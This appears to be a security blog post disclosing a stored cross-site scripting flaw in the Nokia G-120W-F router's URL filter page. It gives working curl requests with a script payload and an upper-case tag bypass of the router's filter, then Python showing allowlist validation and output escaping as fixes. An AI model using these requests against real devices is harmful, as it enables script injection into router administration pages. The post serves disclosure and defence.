
Stored XSS - Router Nokia G-120W-F

How to exploit a stored XSS on the Nokia G-120W-F router

Device

| Field | Value |
|---|---|
| Device Name | G-120W-F |
| Vendor | Nokia |
| Serial Number | ALCLFA5F444E |
| Hardware Version | 3FE46921AAAA |
| Boot Version | U-Boot Dec-31-2016–12:00:00 |
| Software Version | 3FE46606AGAB91 |
| Chipset | MTK7526FD |

Exploitation

Through the web interface, it is not possible to inject JavaScript code into any of the form fields.


But by analyzing the request, we can copy the same request and change the data that is sent to the router.


When we insert valid data, the interface makes a POST request to a CGI script called urlfilter.cgi. Firefox has an option that copies the request as a cURL command, including the User-Agent, Content-Type, Cookie and the data that was sent in the request. To obtain the command, just right-click on the request and choose the option "Copy as cURL".

In my case it looked like this:

```bash
curl 'http://192.168.237.254/urlfilter.cgi?add' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://192.168.237.254' -H 'Connection: keep-alive' -H 'Referer: http://192.168.237.254/urlfilter.cgi' -H 'Cookie: lsid=YRTNSynGMeHSwqOx; lang=../../..; sid=KpJqGrBuvsTrduXP; admin=1' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'csrf_token=LnwHSQKbNXXlDciL&passwd_token_value=&url_address=http%3A%2F%2F0xdutra.com&port_num=8080'
```

If we change the value of the url_address field to a JavaScript payload, we can verify that this page is vulnerable to XSS.

Command changed:

```bash
curl 'http://192.168.237.254/urlfilter.cgi?add' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://192.168.237.254' -H 'Connection: keep-alive' -H 'Referer: http://192.168.237.254/urlfilter.cgi' -H 'Cookie: lsid=YRTNSynGMeHSwqOx; lang=../../..; sid=KpJqGrBuvsTrduXP; admin=1' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'csrf_token=LnwHSQKbNXXlDciL&passwd_token_value=&url_address=<script>alert(1)</script>&port_num=8080'
```

On the first attempt, the router's backend blocked the injection sent via cURL, but it was possible to bypass the protection by writing the tags in upper case.

```bash
curl 'http://192.168.237.254/urlfilter.cgi?add' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://192.168.237.254' -H 'Connection: keep-alive' -H 'Referer: http://192.168.237.254/urlfilter.cgi' -H 'Cookie: lsid=YRTNSynGMeHSwqOx; lang=../../..; sid=KpJqGrBuvsTrduXP; admin=1' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'csrf_token=LnwHSQKbNXXlDciL&passwd_token_value=&url_address=<SCRIPT>alert(1)</SCRIPT>&port_num=8080'
```

Now, whenever we open the URL Filter page, a dialog box appears printing the number 1 on the screen: the payload is stored and executed on every visit.

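The behaviour above (lowercase `<script>` rejected, uppercase accepted) is consistent with a case-sensitive blacklist on the submitted value. The following added example, which is not the router's code and only models the observed behaviour, contrasts that weak check with the two controls that actually close the hole: allowlist validation of url_address as a URL, and HTML-escaping of the stored value when the filter table is rendered.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed model of the observed filter: a literal, case-sensitive match on
# the tag text. That the router works exactly this way is an assumption.
BLOCKED_TAGS = ("<script>", "</script>")


def weak_filter_accepts(url_address: str) -> bool:
    """Case-sensitive blacklist: rejects <script> but lets <SCRIPT> through."""
    return not any(tag in url_address for tag in BLOCKED_TAGS)


# One DNS label: letters, digits and hyphens, no leading or trailing hyphen.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def validate_url_address(url_address: str) -> bool:
    """Allowlist validation: only http(s) URLs with a well-formed host pass.

    Rejecting everything that is not a URL is stronger than blacklisting tag
    spellings, because no case variant or alternative tag is left to slip by.
    """
    try:
        parts = urlsplit(url_address)
    except ValueError:  # e.g. malformed IPv6 literal
        return False
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    return all(_LABEL.match(label) for label in parts.hostname.split("."))


def render_filter_row(url_address: str, port_num: int) -> str:
    """Output encoding: whatever got stored is escaped before it reaches HTML."""
    return f"<td>{html.escape(url_address)}</td><td>{int(port_num)}</td>"


if __name__ == "__main__":
    for value in ("http://0xdutra.com", "<script>alert(1)</script>",
                  "<SCRIPT>alert(1)</SCRIPT>"):
        print(f"{value!r}: weak={weak_filter_accepts(value)} "
              f"allowlist={validate_url_address(value)}")
    print(render_filter_row("<SCRIPT>alert(1)</SCRIPT>", 8080))
```

Even with the allowlist in place, the escaping in `render_filter_row` stays: entries written to storage by other paths (older firmware, a config restore) must not be trusted by the template either.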


This post is licensed under CC BY 4.0 by the author.